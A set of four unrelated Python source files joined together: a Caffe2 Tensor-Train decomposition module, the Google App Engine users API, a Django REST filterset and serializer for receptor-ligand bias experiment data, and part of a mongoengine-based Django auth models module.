# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
## @package tt_core
# Module caffe2.python.tt_core
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
"""
The following methods are various utility methods for using the Tensor-Train
decomposition, or TT-decomposition introduced by I. V. Oseledets (2011) in his
paper (http://epubs.siam.org/doi/abs/10.1137/090752286).
Broadly speaking, these methods are used to replace fully connected layers in
neural networks with Tensor-Train layers introduced by A. Novikov et. al. (2015)
in their paper (http://arxiv.org/abs/1509.06569). More details about each of
the methods are provided in each respective docstring.
"""
def init_tt_cores(inp_sizes, out_sizes, tt_ranks, seed=1234):
"""
Initialize randomized orthogonalized TT-cores.
This method should be used when a TT-layer is trained from scratch. The
sizes of each of the cores are specified by the inp_sizes and out_sizes, and
the respective tt_ranks will dictate the ranks of each of the cores. Note
that a larger set of tt_ranks will result in slower computation but will
result in more accurate approximations. The size of the ith core is:
tt_ranks[i] * inp_sizes[i] * out_sizes[i] * tt_ranks[i + 1].
Note that the following relationships of lengths of each input is expected:
len(inp_sizes) == len(out_sizes) == len(tt_ranks) - 1.
Args:
inp_sizes: list of the input dimensions of the respective cores
out_sizes: list of the output dimensions of the respective cores
tt_ranks: list of the ranks of the respective cores
seed: integer to seed the random number generator
Returns:
cores: One-dimensional list of cores concatentated along an axis
"""
np.random.seed(seed)
# Assert that the sizes of each input is correct
assert(len(inp_sizes) == len(out_sizes)), \
"The number of input dimensions (" + str(len(inp_sizes)) + \
") must be equal to the number of output dimensions (" + \
str(len(out_sizes)) + ")."
assert(len(tt_ranks) == len(inp_sizes) + 1), \
"The number of tt-ranks (" + str(len(tt_ranks)) + ") must be " + \
"one more than the number of input and output dims (" + \
str(len(out_sizes)) + ")."
# Convert to numpy arrays
inp_sizes = np.array(inp_sizes)
out_sizes = np.array(out_sizes)
tt_ranks = np.array(tt_ranks)
# Initialize the cores array
cores_len = np.sum(
inp_sizes * out_sizes * tt_ranks[1:] * tt_ranks[:-1])
cores = np.zeros(cores_len)
cores_idx = 0
rv = 1
# Compute the full list of cores by computing each individual one
for i in range(inp_sizes.shape[0]):
shape = [tt_ranks[i],
inp_sizes[i],
out_sizes[i],
tt_ranks[i + 1]]
# Precompute the shape of each core
tall_shape = (np.prod(shape[:3]), shape[3])
# Randomly initialize the current core using a normal distribution
curr_core = np.dot(rv, np.random.normal(
0, 1, size=(shape[0], np.prod(shape[1:]))))
curr_core = curr_core.reshape(tall_shape)
# Orthogonalize the initialized current core and append to cores list
if i < inp_sizes.shape[0] - 1:
curr_core, rv = np.linalg.qr(curr_core)
cores[cores_idx:cores_idx +
curr_core.size] = curr_core.flatten()
cores_idx += curr_core.size
# Normalize the list of arrays using this Glarot trick
glarot_style = (np.prod(inp_sizes) *
np.prod(tt_ranks))**(1.0 / inp_sizes.shape[0])
return (0.1 / glarot_style) * np.array(cores).astype(np.float32)
def matrix_to_tt(W, inp_sizes, out_sizes, tt_ranks):
"""
Convert a matrix into the TT-format.
This method will consume a 2D weight matrix such as those used in fully
connected layers in a neural network and will compute the TT-decomposition
of the weight matrix and return the TT-cores of the resulting computation.
This method should be used when converting a trained, fully connected layer,
into a TT-layer for increased speed and decreased parameter size. The size
of the ith core is:
tt_ranks[i] * inp_sizes[i] * out_sizes[i] * tt_ranks[i + 1].
Note that the following relationships of lengths of each input is expected:
len(inp_sizes) == len(out_sizes) == len(tt_ranks) - 1.
We also require that np.prod(inp_sizes) == W.shape[0] and that
np.prod(out_sizes) == W.shape[1].
Args:
W: two-dimensional weight matrix numpy array representing a fully
connected layer to be converted to TT-format; note that the weight
matrix is transposed before decomposed because we want to emulate the
X * W^T operation that the FC layer performs.
inp_sizes: list of the input dimensions of the respective cores
out_sizes: list of the output dimensions of the respective cores
tt_ranks: list of the ranks of the respective cores
Returns:
new_cores: One-dimensional list of cores concatentated along an axis
"""
# Assert that the sizes of each input is correct
assert(len(inp_sizes) == len(out_sizes)), \
"The number of input dimensions (" + str(len(inp_sizes)) + \
") must be equal to the number of output dimensions (" + \
str(len(out_sizes)) + ")."
assert(len(tt_ranks) == len(inp_sizes) + 1), \
"The number of tt-ranks (" + str(len(tt_ranks)) + ") must be " + \
"one more than the number of input and output dimensions (" + \
str(len(out_sizes)) + ")."
assert(W.shape[0] == np.prod(inp_sizes)), \
"The product of the input sizes (" + str(np.prod(inp_sizes)) + \
") must be equal to first dimension of W (" + str(W.shape[0]) + ")."
assert(W.shape[1] == np.prod(out_sizes)), \
"The product of the output sizes (" + str(np.prod(out_sizes)) + \
") must be equal to second dimension of W (" + str(W.shape[1]) + ")."
# W is transposed so that the multiplication X * W^T can be computed, just
# as it is in the FC layer.
W = W.transpose()
# Convert to numpy arrays
inp_sizes = np.array(inp_sizes)
out_sizes = np.array(out_sizes)
tt_ranks = np.array(tt_ranks)
# Copy the original weight matrix in order to permute and reshape the weight
# matrix. In addition, the inp_sizes and out_sizes are combined to a single
# sizes array to use the tt_svd helper method, which only consumes a single
# sizes array.
W_copy = W.copy()
total_inp_size = inp_sizes.size
W_copy = np.reshape(W_copy, np.concatenate((inp_sizes, out_sizes)))
order = np.repeat(np.arange(0, total_inp_size), 2) + \
np.tile([0, total_inp_size], total_inp_size)
W_copy = np.transpose(W_copy, axes=order)
W_copy = np.reshape(W_copy, inp_sizes * out_sizes)
# Use helper method to convert the W matrix copy into the preliminary
# cores array.
cores = tt_svd(W_copy, inp_sizes * out_sizes, tt_ranks)
# Permute the dimensions of each of the cores to be compatible with the
# TT-layer.
new_cores = np.zeros(cores.shape).astype(np.float32)
idx = 0
for i in range(len(inp_sizes)):
shape = (tt_ranks[i], inp_sizes[i], out_sizes[i], tt_ranks[i + 1])
current_core = cores[idx:idx + np.prod(shape)].reshape(shape)
current_core = current_core.transpose((1, 3, 0, 2))
new_cores[new_cores.shape[0] - idx - np.prod(shape):
new_cores.shape[0] - idx] \
= current_core.flatten()
idx += np.prod(shape)
return new_cores
def tt_svd(W, sizes, tt_ranks):
"""
Helper method for the matrix_to_tt() method performing the TT-SVD
decomposition.
Uses the TT-decomposition algorithm to convert a matrix to TT-format using
multiple reduced SVD operations.
Args:
W: two-dimensional weight matrix representing a fully connected layer to
be converted to TT-format preprocessed by the matrix_to_tt() method.
sizes: list of the dimensions of each of the cores
tt_ranks: list of the ranks of the respective cores
Returns:
cores: One-dimensional list of cores concatentated along an axis
"""
assert(len(tt_ranks) == len(sizes) + 1)
C = W.copy()
total_size = sizes.size
core = np.zeros(np.sum(tt_ranks[:-1] * sizes * tt_ranks[1:]),
dtype='float32')
# Compute iterative reduced SVD operations and store each resulting U matrix
# as an individual core.
pos = 0
for i in range(0, total_size - 1):
shape = tt_ranks[i] * sizes[i]
C = np.reshape(C, [shape, -1])
U, S, V = np.linalg.svd(C, full_matrices=False)
U = U[:, 0:tt_ranks[i + 1]]
S = S[0:tt_ranks[i + 1]]
V = V[0:tt_ranks[i + 1], :]
core[pos:pos + tt_ranks[i] * sizes[i] * tt_ranks[i + 1]] = U.ravel()
pos += tt_ranks[i] * sizes[i] * tt_ranks[i + 1]
C = np.dot(np.diag(S), V)
core[pos:pos + tt_ranks[total_size - 1] *
sizes[total_size - 1] * tt_ranks[total_size]] = C.ravel()
return core
# TODO(Surya) Write a method to convert an entire network where all fully
# connected layers are replaced by an TT layer.
def fc_net_to_tt_net(net):
pass
| |
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""The User Python datastore class to be used as a datastore data type."""
import os
from google.appengine.api import apiproxy_stub_map
from google.appengine.api import user_service_pb
from google.appengine.runtime import apiproxy_errors
class Error(Exception):
"""Base User error type."""
class UserNotFoundError(Error):
"""No email argument was specified, and no user is logged in."""
class RedirectTooLongError(Error):
"""The generated redirect URL was too long."""
class NotAllowedError(Error):
"""The requested redirect URL is not allowed."""
class User(object):
"""Provides the email address, nickname, and ID for a user.
A nickname is a human-readable string that uniquely identifies a Google user,
akin to a username. For some users, this nickname is an email address, but for
other users, a different nickname is used.
A user is a Google Accounts user.
`federated_identity` and `federated_provider` are decommissioned and should
not be used.
"""
__user_id = None
__federated_identity = None
__federated_provider = None
def __init__(self, email=None, _auth_domain=None,
_user_id=None, federated_identity=None, federated_provider=None,
_strict_mode=True):
"""Constructor.
Args:
email: An optional string of the user's email address. It defaults to
the current user's email address.
federated_identity: Decommissioned, don't use.
federated_provider: Decommissioned, don't use.
Raises:
UserNotFoundError: If the user is not logged in and both `email` and
`federated_identity` are empty.
"""
if _auth_domain is None:
_auth_domain = os.environ.get('AUTH_DOMAIN')
assert _auth_domain
if email is None and federated_identity is None:
email = os.environ.get('USER_EMAIL', email)
_user_id = os.environ.get('USER_ID', _user_id)
federated_identity = os.environ.get('FEDERATED_IDENTITY',
federated_identity)
federated_provider = os.environ.get('FEDERATED_PROVIDER',
federated_provider)
if email is None:
email = ''
if not email and not federated_identity and _strict_mode:
raise UserNotFoundError
self.__email = email
self.__federated_identity = federated_identity
self.__federated_provider = federated_provider
self.__auth_domain = _auth_domain
self.__user_id = _user_id or None
def nickname(self):
"""Returns the user's nickname.
The nickname will be a unique, human readable identifier for this user with
respect to this application. It will be an email address for some users,
and part of the email address for some users.
Returns:
The nickname of the user as a string.
"""
if (self.__email and self.__auth_domain and
self.__email.endswith('@' + self.__auth_domain)):
suffix_len = len(self.__auth_domain) + 1
return self.__email[:-suffix_len]
elif self.__federated_identity:
return self.__federated_identity
else:
return self.__email
def email(self):
"""Returns the user's email address."""
return self.__email
def user_id(self):
"""Obtains the user ID of the user.
Returns:
A permanent unique identifying string or `None`. If the email address was
set explicity, this will return `None`.
"""
return self.__user_id
def auth_domain(self):
"""Obtains the user's authentication domain.
Returns:
A string containing the authentication domain. This method is internal and
should not be used by client applications.
"""
return self.__auth_domain
def federated_identity(self):
"""Decommissioned, don't use.
Returns:
A string containing the federated identity of the user. If the user is not
a federated user, `None` is returned.
"""
return self.__federated_identity
def federated_provider(self):
"""Decommissioned, don't use.
Returns:
A string containing the federated provider. If the user is not a federated
user, `None` is returned.
"""
return self.__federated_provider
def __unicode__(self):
return unicode(self.nickname())
def __str__(self):
return str(self.nickname())
def __repr__(self):
values = []
if self.__email:
values.append("email='%s'" % self.__email)
if self.__federated_identity:
values.append("federated_identity='%s'" % self.__federated_identity)
if self.__user_id:
values.append("_user_id='%s'" % self.__user_id)
return 'users.User(%s)' % ','.join(values)
def __hash__(self):
if self.__federated_identity:
return hash((self.__federated_identity, self.__auth_domain))
else:
return hash((self.__email, self.__auth_domain))
def __cmp__(self, other):
if not isinstance(other, User):
return NotImplemented
if self.__federated_identity:
return cmp((self.__federated_identity, self.__auth_domain),
(other.__federated_identity, other.__auth_domain))
else:
return cmp((self.__email, self.__auth_domain),
(other.__email, other.__auth_domain))
def create_login_url(dest_url=None, _auth_domain=None,
federated_identity=None):
"""Computes the login URL for redirection.
Args:
dest_url: String that is the desired final destination URL for the user
once login is complete. If `dest_url` does not specify a host, the host
from the current request is used.
federated_identity: Decommissioned, don't use. Setting this to a non-None
value raises a NotAllowedError
Returns:
Login URL as a string. The login URL will use Google Accounts.
Raises:
NotAllowedError: If federated_identity is not None.
"""
req = user_service_pb.CreateLoginURLRequest()
resp = user_service_pb.CreateLoginURLResponse()
if dest_url:
req.set_destination_url(dest_url)
else:
req.set_destination_url('')
if _auth_domain:
req.set_auth_domain(_auth_domain)
if federated_identity:
raise NotAllowedError('OpenID 2.0 support is decomissioned')
try:
apiproxy_stub_map.MakeSyncCall('user', 'CreateLoginURL', req, resp)
except apiproxy_errors.ApplicationError, e:
if (e.application_error ==
user_service_pb.UserServiceError.REDIRECT_URL_TOO_LONG):
raise RedirectTooLongError
elif (e.application_error ==
user_service_pb.UserServiceError.NOT_ALLOWED):
raise NotAllowedError
else:
raise e
return resp.login_url()
CreateLoginURL = create_login_url
def create_logout_url(dest_url, _auth_domain=None):
"""Computes the logout URL and specified destination URL for the request.
This function works for Google Accounts applications.
Args:
dest_url: String that is the desired final destination URL for the user
after the user has logged out. If `dest_url` does not specify a host,
the host from the current request is used.
Returns:
Logout URL as a string.
"""
req = user_service_pb.CreateLogoutURLRequest()
resp = user_service_pb.CreateLogoutURLResponse()
req.set_destination_url(dest_url)
if _auth_domain:
req.set_auth_domain(_auth_domain)
try:
apiproxy_stub_map.MakeSyncCall('user', 'CreateLogoutURL', req, resp)
except apiproxy_errors.ApplicationError, e:
if (e.application_error ==
user_service_pb.UserServiceError.REDIRECT_URL_TOO_LONG):
raise RedirectTooLongError
else:
raise e
return resp.logout_url()
CreateLogoutURL = create_logout_url
def get_current_user():
"""Retrieves information associated with the user that is making a request.
Returns:
"""
try:
return User()
except UserNotFoundError:
return None
GetCurrentUser = get_current_user
def is_current_user_admin():
"""Specifies whether the user making a request is an application admin.
Because administrator status is not persisted in the datastore,
`is_current_user_admin()` is a separate function rather than a member function
of the `User` class. The status only exists for the user making the current
request.
Returns:
`True` if the user is an administrator; all other user types return `False`.
"""
return (os.environ.get('USER_IS_ADMIN', '0')) == '1'
IsCurrentUserAdmin = is_current_user_admin
| |
from django.db.models import IntegerField, FloatField
from django.db.models.functions import Cast
from django_filters import filters
from rest_framework_datatables.django_filters.filterset import DatatablesFilterSet
from rest_framework import serializers
from .models import AnalyzedExperiment
class AnalyzedExperimentFilter(DatatablesFilterSet):
class_ = filters.CharFilter(
field_name='receptor__family__parent__parent__parent_id',
method='yadcf_multiple_choices_query', required=False
)
receptor_family = filters.CharFilter(
field_name='receptor__family__parent_id',
method='yadcf_multiple_choices_query', required=False
)
uniprot = filters.CharFilter(
field_name='receptor_id',
method='yadcf_multiple_choices_query', required=False
)
iuphar = filters.CharFilter(
field_name='receptor_id',
method='yadcf_multiple_choices_query', required=False
)
species = filters.CharFilter(
field_name='receptor__species_id',
method='yadcf_multiple_choices_query', required=False
)
endogenous_ligand = filters.CharFilter(
field_name="endogenous_ligand_id",
method='yadcf_multiple_choices_query', required=False
)
reference_ligand = filters.CharFilter(
field_name="reference_ligand_id",
method='yadcf_multiple_choices_query', required=False
)
ligand = filters.CharFilter(
field_name="ligand_id",
method='yadcf_multiple_choices_query', required=False
)
# We need to fix ordering for this field.
vendor_quantity = filters.CharFilter(
method='yadcf_range_filter_with_integer_cast', required=False
)
article_quantity = filters.CharFilter(
method='yadcf_range_filter_with_integer_cast', required=False
)
labs_quantity = filters.CharFilter(
method='yadcf_range_filter_with_integer_cast', required=False
)
primary = filters.CharFilter(
# field_name='primary',
method='transducers_multiple_choices_filter', required=False
)
secondary = filters.CharFilter(
# field_name='primary',
method='transducers_multiple_choices_filter', required=False
)
pathways_p1 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
pathways_p2 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
pathways_p3 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
pathways_p4 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
pathways_p5 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
opmodel_p2_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
opmodel_p3_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
opmodel_p4_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
opmodel_p5_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
lbf_p2_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
lbf_p3_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
lbf_p4_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
lbf_p5_p1 = filters.CharFilter(
method='yadcf_range_filter_with_float_cast', required=False
)
potency_p2_p1 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
potency_p3_p1 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
potency_p4_p1 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
potency_p5_p1 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
activity_p1 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
activity_p2 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
activity_p3 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
activity_p4 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
activity_p5 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
emax_p1 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
emax_p2 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
emax_p3 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
emax_p4 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
emax_p5 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
tfactor_p1 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
tfactor_p2 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
tfactor_p3 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
tfactor_p4 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
tfactor_p5 = filters.CharFilter(
method='yadcf_range_filter', required=False
)
assay_p1 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
assay_p2 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
assay_p3 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
assay_p4 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
assay_p5 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
cell_p1 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
cell_p2 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
cell_p3 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
cell_p4 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
cell_p5 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
time_p1 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
time_p2 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
time_p3 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
time_p4 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
time_p5 = filters.CharFilter(
method='yadcf_multiple_choices_query', required=False
)
authors = filters.CharFilter(
field_name='publication__authors',
method='yadcf_multiple_choices_query', required=False
)
doi_reference = filters.CharFilter(
field_name='publication__web_link_id',
method='yadcf_multiple_choices_query', required=False
)
class Meta:
queryset = AnalyzedExperiment.objects.all()
fields = [
'id','class_', 'receptor_family', 'uniprot', 'iuphar', 'species', 'endogenous_ligand',
'reference_ligand', 'ligand_biased', 'vendor_quantity', 'article_quantity', 'ligand_labs',
'primary', 'secondary',
'pathways_p1', 'pathways_p2', 'pathways_p3', 'pathways_p4', 'pathways_p5',
'opmodel_p2_p1', 'opmodel_p3_p1', 'opmodel_p4_p1', 'opmodel_p5_p1',
'lbf_p2_p1', 'lbf_p3_p1', 'lbf_p4_p1', 'lbf_p5_p1',
'potency_p2_p1', 'potency_p3_p1', 'potency_p4_p1', 'potency_p5_p1',
'activity_p1', 'activity_p2', 'activity_p3', 'activity_p4', 'activity_p5',
'emax_p1', 'emax_p2', 'emax_p3', 'emax_p4', 'emax_p5',
'tfactor_p1', 'tfactor_p2', 'tfactor_p3', 'tfactor_p4', 'tfactor_p5',
'assay_p1', 'assay_p2', 'assay_p3', 'assay_p4', 'assay_p5',
'cell_p1', 'cell_p2', 'cell_p3', 'cell_p4', 'cell_p5',
'time_p1', 'time_p2', 'time_p3', 'time_p4', 'time_p5',
'authors', 'doi_reference','ligand_id','publication_link','quality_activity_p1',
'quality_activity_p2','quality_activity_p3','quality_activity_p4','quality_activity_p5',
'standard_type_p1','standard_type_p2','standard_type_p3','standard_type_p4','standard_type_p5',
'ligand_source_id','ligand_source_type'
]
read_only_fields = fields
@staticmethod
def yadcf_range_filter_with_integer_cast(queryset, field_name, value):
min_value, max_value = value.split('-yadcf_delim-')
try:
min_value = float(min_value)
except ValueError:
min_value = None
try:
max_value = float(max_value)
except ValueError:
max_value = None
queryset = queryset.annotate(**{f'{field_name}_as_integer': Cast(field_name, IntegerField())})
if min_value is not None:
queryset = queryset.filter(**{f'{field_name}_as_integer__gte': min_value})
if max_value is not None:
queryset = queryset.filter(**{f'{field_name}_as_integer__lte': max_value})
return queryset
@staticmethod
def yadcf_range_filter_with_float_cast(queryset, field_name, value):
min_value, max_value = value.split('-yadcf_delim-')
try:
min_value = float(min_value)
except ValueError:
min_value = None
try:
max_value = float(max_value)
except ValueError:
max_value = None
queryset = queryset.annotate(**{f'{field_name}_as_float': Cast(field_name, FloatField())})
if field_name in ['lbf_p2_p1', 'lbf_p3_p1', 'lbf_p4_p1', 'lbf_p5_p1']:
# TODO: Come up with numeric values for:
queryset = queryset.exclude(
**{f'{field_name}__in': ['High Bias', 'Full Bias', 'Low Bias','']}
)
if min_value is not None:
queryset = queryset.filter(**{f'{field_name}_as_float__gte': min_value})
if max_value is not None:
queryset = queryset.filter(**{f'{field_name}_as_float__lte': max_value})
return queryset
@staticmethod
def yadcf_range_filter(queryset, field_name, value):
min_value, max_value = value.split('-yadcf_delim-')
try:
min_value = float(min_value)
except ValueError:
min_value = None
try:
max_value = float(max_value)
except ValueError:
max_value = None
if min_value:
queryset = queryset.filter(**{f'{field_name}__gte': min_value})
if max_value:
queryset = queryset.filter(**{f'{field_name}__lte': max_value})
return queryset
@staticmethod
def yadcf_multiple_choices_query(queryset, field_name, value):
choices = value.replace('\\', '').split('|')
return queryset.filter(**{f'{field_name}__in': choices})
@staticmethod
def transducers_multiple_choices_filter(queryset, field_name, value):
choices = value.replace('\\', '').replace('_', ' ').split('|')
return queryset.filter(**{f'{field_name}__in': choices})
class AnalyzedExperimentSerializer(serializers.ModelSerializer):
# receptor
class_ = serializers.SerializerMethodField()
receptor_family = serializers.CharField(source='receptor.family.parent')
uniprot = serializers.SerializerMethodField()
iuphar = serializers.SerializerMethodField()
species = serializers.CharField(source='receptor.species.common_name')
endogenous_ligand = serializers.CharField()
# Ligand
reference_ligand = serializers.CharField()
ligand = serializers.CharField(source='ligand.name')
vendor_quantity = serializers.CharField()
article_quantity = serializers.CharField()
labs_quantity = serializers.CharField()
# Receptor transducers
primary = serializers.SerializerMethodField()
secondary = serializers.SerializerMethodField()
# Pathways
pathways_p1 = serializers.CharField()
pathways_p2 = serializers.CharField()
pathways_p3 = serializers.CharField()
pathways_p4 = serializers.CharField()
pathways_p5 = serializers.CharField()
# operational model
opmodel_p2_p1 = serializers.CharField()
opmodel_p3_p1 = serializers.CharField()
opmodel_p4_p1 = serializers.CharField()
opmodel_p5_p1 = serializers.CharField()
# log bias factor
lbf_p2_p1 = serializers.CharField()
lbf_p3_p1 = serializers.CharField()
lbf_p4_p1 = serializers.CharField()
lbf_p5_p1 = serializers.CharField()
# Potency ratio
potency_p2_p1 = serializers.CharField()
potency_p3_p1 = serializers.CharField()
potency_p4_p1 = serializers.CharField()
potency_p5_p1 = serializers.CharField()
quality_activity_p1 = serializers.CharField()
quality_activity_p2 = serializers.CharField()
quality_activity_p3 = serializers.CharField()
quality_activity_p4 = serializers.CharField()
quality_activity_p5 = serializers.CharField()
standard_type_p1 = serializers.CharField()
standard_type_p2 = serializers.CharField()
standard_type_p3 = serializers.CharField()
standard_type_p4 = serializers.CharField()
standard_type_p5 = serializers.CharField()
# Potency
activity_p1 = serializers.CharField()
activity_p2 = serializers.CharField()
activity_p3 = serializers.CharField()
activity_p4 = serializers.CharField()
activity_p5 = serializers.CharField()
emax_p1 = serializers.CharField()
emax_p2 = serializers.CharField()
emax_p3 = serializers.CharField()
emax_p4 = serializers.CharField()
emax_p5 = serializers.CharField()
tfactor_p1 = serializers.CharField()
tfactor_p2 = serializers.CharField()
tfactor_p3 = serializers.CharField()
tfactor_p4 = serializers.CharField()
tfactor_p5 = serializers.CharField()
assay_p1 = serializers.CharField()
assay_p2 = serializers.CharField()
assay_p3 = serializers.CharField()
assay_p4 = serializers.CharField()
assay_p5 = serializers.CharField()
cell_p1 = serializers.CharField()
cell_p2 = serializers.CharField()
cell_p3 = serializers.CharField()
cell_p4 = serializers.CharField()
cell_p5 = serializers.CharField()
time_p1 = serializers.CharField()
time_p2 = serializers.CharField()
time_p3 = serializers.CharField()
time_p4 = serializers.CharField()
time_p5 = serializers.CharField()
authors = serializers.CharField(source='publication.authors')
doi_reference = serializers.CharField(source='publication.web_link.index')
id = serializers.CharField()
ligand_id =serializers.CharField(source='ligand.id')
publication_link = serializers.CharField(source='publication.web_link')
ligand_source_id= serializers.CharField()
ligand_source_type= serializers.CharField()
class Meta:
model = AnalyzedExperiment
fields = [
'id','class_', 'receptor_family', 'uniprot', 'iuphar', 'species', 'endogenous_ligand',
'reference_ligand', 'ligand', 'vendor_quantity', 'article_quantity', 'labs_quantity',
'primary', 'secondary',
'pathways_p1', 'pathways_p2', 'pathways_p3', 'pathways_p4', 'pathways_p5',
'opmodel_p2_p1', 'opmodel_p3_p1', 'opmodel_p4_p1', 'opmodel_p5_p1',
'lbf_p2_p1', 'lbf_p3_p1', 'lbf_p4_p1', 'lbf_p5_p1',
'potency_p2_p1', 'potency_p3_p1', 'potency_p4_p1', 'potency_p5_p1',
'activity_p1', 'activity_p2', 'activity_p3', 'activity_p4', 'activity_p5',
'emax_p1', 'emax_p2', 'emax_p3', 'emax_p4', 'emax_p5',
'tfactor_p1', 'tfactor_p2', 'tfactor_p3', 'tfactor_p4', 'tfactor_p5',
'assay_p1', 'assay_p2', 'assay_p3', 'assay_p4', 'assay_p5',
'cell_p1', 'cell_p2', 'cell_p3', 'cell_p4', 'cell_p5',
'time_p1', 'time_p2', 'time_p3', 'time_p4', 'time_p5',
'authors', 'doi_reference','ligand_id', 'publication_link','quality_activity_p1',
'quality_activity_p2','quality_activity_p3','quality_activity_p4','quality_activity_p5',
'standard_type_p1','standard_type_p2','standard_type_p3','standard_type_p4','standard_type_p5',
'ligand_source_id','ligand_source_type'
]
@staticmethod
def get_class_(obj):
class_receptor = obj.receptor.family.parent.parent.parent.name
return class_receptor.replace('Class', '').strip()
@staticmethod
def get_iuphar(obj):
iuphar_name = obj.receptor.name.split(' ', 1)[0].split('-adrenoceptor', 1)[0].strip()
return iuphar_name
@staticmethod
def get_uniprot(obj):
uniprot = obj.receptor.entry_short()
return uniprot
@staticmethod
def get_primary(obj):
return obj.primary.replace(' family,', '')
@staticmethod
def get_secondary(obj):
return obj.secondary.replace(' family,', '')
| |
from mongoengine import *
from django.conf import settings
from django.contrib import auth
from django.contrib.auth.hashers import make_password, check_password
from django.contrib.auth.models import _user_has_perm, _user_get_all_permissions, _user_has_module_perms
from django.contrib.contenttypes.models import ContentTypeManager
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from django.utils.translation import ugettext_lazy as _
try:
from django.utils.module_loading import import_module
except ImportError:
"""Handle older versions of Django"""
from django.utils.importlib import import_module
from djangome.utils import datetime_now #, make_password, check_password
REDIRECT_FIELD_NAME = 'next'
MONGOENGINE_USER_DOCUMENT = getattr(settings, 'MONGOENGINE_USER_DOCUMENT', 'djangome.mongo_auth.models.User')
__all__ = (
'get_user_document',
)
def get_user_document():
"""Get the user document class used for authentication.
This is the class defined in settings.MONGOENGINE_USER_DOCUMENT, which
defaults to `djangome.auth.User`.
"""
name = MONGOENGINE_USER_DOCUMENT
dot = name.rindex('.')
module = import_module(name[:dot])
return getattr(module, name[dot + 1:])
class SiteProfileNotAvailable(Exception):
pass
class ContentType(Document):
name = StringField(max_length=100)
app_label = StringField(max_length=100)
model = StringField(max_length=100, verbose_name=_('python model class name'),
unique_with='app_label')
objects = ContentTypeManager()
class Meta:
verbose_name = _('content type')
verbose_name_plural = _('content types')
# db_table = 'django_content_type'
# ordering = ('name',)
# unique_together = (('app_label', 'model'),)
def __unicode__(self):
return self.name
def model_class(self):
"""Returns the Python model class for this type of content."""
from django.db import models
return models.get_model(self.app_label, self.model)
def get_object_for_this_type(self, **kwargs):
"""
Returns an object of this type for the keyword arguments given.
Basically, this is a proxy around this object_type's get_object() model
method. The ObjectNotExist exception, if thrown, will not be caught,
so code that calls this method should catch it.
"""
return self.model_class()._default_manager.using(self._state.db).get(**kwargs)
def natural_key(self):
return (self.app_label, self.model)
class PermissionManager(models.Manager):
def get_by_natural_key(self, codename, app_label, model):
return self.get(
codename=codename,
content_type=ContentType.objects.get_by_natural_key(app_label, model)
)
class Permission(Document):
"""The permissions system provides a way to assign permissions to specific
users and groups of users.
The permission system is used by the Django admin site, but may also be
useful in your own code. The Django admin site uses permissions as follows:
- The "add" permission limits the user's ability to view the "add"
form and add an object.
- The "change" permission limits a user's ability to view the change
list, view the "change" form and change an object.
- The "delete" permission limits the ability to delete an object.
Permissions are set globally per type of object, not per specific object
instance. It is possible to say "Mary may change news stories," but it's
not currently possible to say "Mary may change news stories, but only the
ones she created herself" or "Mary may only change news stories that have
a certain status or publication date."
Three basic permissions -- add, change and delete -- are automatically
created for each Django model.
"""
name = StringField(max_length=50, verbose_name=_('username'))
content_type = ReferenceField(ContentType)
codename = StringField(max_length=100, verbose_name=_('codename'))
# FIXME: don't access field of the other class
# unique_with=['content_type__app_label', 'content_type__model'])
objects = PermissionManager()
class Meta:
verbose_name = _('permission')
verbose_name_plural = _('permissions')
